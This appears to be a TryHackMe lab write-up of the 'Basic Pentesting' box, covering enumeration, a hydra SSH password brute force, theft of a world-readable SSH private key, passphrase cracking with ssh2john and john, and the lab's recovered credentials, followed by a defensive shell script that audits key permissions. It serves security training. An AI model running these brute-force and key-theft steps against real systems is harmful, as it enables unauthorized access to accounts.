TryHackMe — Basic Pentesting
Difficulty: Easy
Date: June 29, 2026
Author: Ross Fisher
Overview
Basic Pentesting teaches a realistic engagement workflow — read notes left by developers, extract usernames from SMB, brute force SSH, pivot between users using a stolen SSH key, and crack the passphrase to get in. No fancy exploits. Just enumeration, credential attacks, and following the breadcrumbs the box leaves you.
Credentials found:
- jan:armando (SSH brute force)
- kay key passphrase: beeswax
- kay’s pass.bak contents: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Recon
Nmap
sudo nmap -sV -sC -p- --min-rate 5000 -Pn 10.144.128.155
Key ports:
- 22 — OpenSSH 8.2p1
- 80 — Apache 2.4.41
- 139/445 — Samba SMB
- 8009 — Apache Jserv AJP13
- 8080 — Apache Tomcat 9.0.7
The -sC flag runs default NSE scripts which immediately pulled SMB signing info and the NetBIOS name BASIC2. Always use -sC when you see SMB open — it saves a separate enumeration step.
Web — /development
Gobuster found /development on port 80:
gobuster dir -u http://10.144.128.155 -w /usr/share/wordlists/dirb/common.txt -t 50
Inside were two developer notes that handed us everything we needed:
Note 1:
- Apache Struts 2.5.12 running (known vulnerable version)
- Written and signed by K
Note 2:
- SMB configured — signed by K
- K audited /etc/shadow and cracked J’s hash easily; J has a weak password and was told to change it
This tells us two things immediately: the usernames are jan and kay, and jan has a weak password in rockyou.
SMB Enumeration — enum4linux
enum4linux -a 10.144.128.155
Confirmed the Unix usernames via RID cycling:
S-1-22-1-1000 Unix User\kay
S-1-22-1-1001 Unix User\jan
S-1-22-1-1002 Unix User\ubuntu
Also found an Anonymous share with read access — worth checking on future engagements even if it was empty here.
Foothold — Brute Forcing jan’s SSH Password
Armed with the username jan and the knowledge that the password is weak:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.144.128.155
Cracked in about 3 minutes:
[22][ssh] host: 10.144.128.155 login: jan password: armando
ssh jan@10.144.128.155
# password: armando
Privilege Escalation — jan to kay
Enumeration as jan
sudo -l
# Sorry, user jan may not run sudo on ip-10-144-128-155.
find / -perm -u=s -type f 2>/dev/null
# Nothing useful — all standard system binaries
Checked kay’s home directory:
ls -la /home/kay/
Found:
- pass.bak — no read permission as jan
- .ssh/ directory — readable
ls -la /home/kay/.ssh/
# id_rsa is readable by everyone (permissions: -rw-r--r--)
cat /home/kay/.ssh/id_rsa
Kay’s SSH private key was world-readable. Copied it back to Kali.
Cracking the Key Passphrase
The key header showed Proc-Type: 4,ENCRYPTED — passphrase protected. Used ssh2john to convert it to a crackable format:
ssh2john ~/THM/kay_key > ~/THM/kay_hash.txt
john ~/THM/kay_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Cracked instantly:
beeswax (/home/ross/THM/kay_key)
SSH as kay
chmod 600 ~/THM/kay_key
ssh -i ~/THM/kay_key kay@10.144.128.155
# passphrase: beeswax
cat pass.bak
# heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Attack Chain Summary
Nmap → SMB + HTTP on 80
→ gobuster → /development → dev notes → usernames jan + kay
→ enum4linux → confirmed jan + kay as Unix users
→ hydra SSH brute force → jan:armando
→ SSH as jan
→ /home/kay/.ssh/id_rsa (world-readable)
→ ssh2john + john → passphrase: beeswax
→ SSH as kay → pass.bak
Key Lessons
1. Developer notes are goldmines. The /development directory handed us usernames, a hint that one password is weak, and information about the tech stack. Always read everything on the web server.
2. enum4linux for any box with 139/445 open. It confirmed the exact Unix usernames via null session RID cycling. Minimum password length of 5 from the password policy also told us the password wouldn’t be complex.
3. Check SSH key permissions. Kay’s id_rsa was world-readable (-rw-r--r--). That’s a misconfiguration that gives any local user a path to escalate. Always check /home/*/.ssh/ when you’re on a box as a low-priv user.
4. ssh2john is the tool for passphrase-protected keys. Same workflow as any other john crack — convert to hash format, run against rockyou.
5. File path matters. Spent time debugging because ~/kay_key resolves to /home/ross/kay_key but the file was in ~/THM/kay_key. Always check ls before assuming a file exists where you think it does.
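As an added, defender-side example (not part of the original writeup), the following POSIX shell function audits the misconfiguration from lesson 3: it walks every .ssh/ directory under a base such as /home and reports any private key whose mode grants read access to group or other. It assumes GNU stat (for stat -c '%a') and that the auditor can read the files it inspects; run it as root from cron or a config check to catch a key like kay's before someone else does.

```shell
#!/bin/sh
# Added audit helper, not part of the original writeup.
# audit_ssh_keys BASE: for each BASE/<user>/.ssh/* that holds private-key
# material, print "<octal mode> <path>" if group or other can read it.
# Exit status 1 if any finding, 0 if every private key is owner-only.
# On this box it would have flagged /home/kay/.ssh/id_rsa (-rw-r--r--),
# which is exactly the file jan used to escalate to kay.

audit_ssh_keys() {
    base="$1"
    findings=0
    for keyfile in "$base"/*/.ssh/*; do
        [ -f "$keyfile" ] || continue
        # Only private keys matter; .pub files, known_hosts and
        # authorized_keys are expected to be readable.
        grep -q "PRIVATE KEY" "$keyfile" 2>/dev/null || continue
        # GNU stat: %a prints the octal mode without a leading zero, e.g. 644.
        mode=$(stat -c '%a' "$keyfile")
        other=$(( mode % 10 ))          # last digit: "other" permissions
        group=$(( (mode / 10) % 10 ))   # middle digit: "group" permissions
        # The read bit is 4; any read access beyond the owner is a finding.
        if [ $(( (group & 4) + (other & 4) )) -ne 0 ]; then
            printf '%s %s\n' "$mode" "$keyfile"
            findings=$(( findings + 1 ))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Run directly with a base directory (e.g. ./audit_ssh_keys.sh /home),
# or source the file and call the function yourself.
if [ -n "${1:-}" ]; then
    audit_ssh_keys "$1"
fi
```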
Tools Used
- nmap (-sV -sC)
- gobuster
- enum4linux
- hydra
- ssh
- ssh2john
- john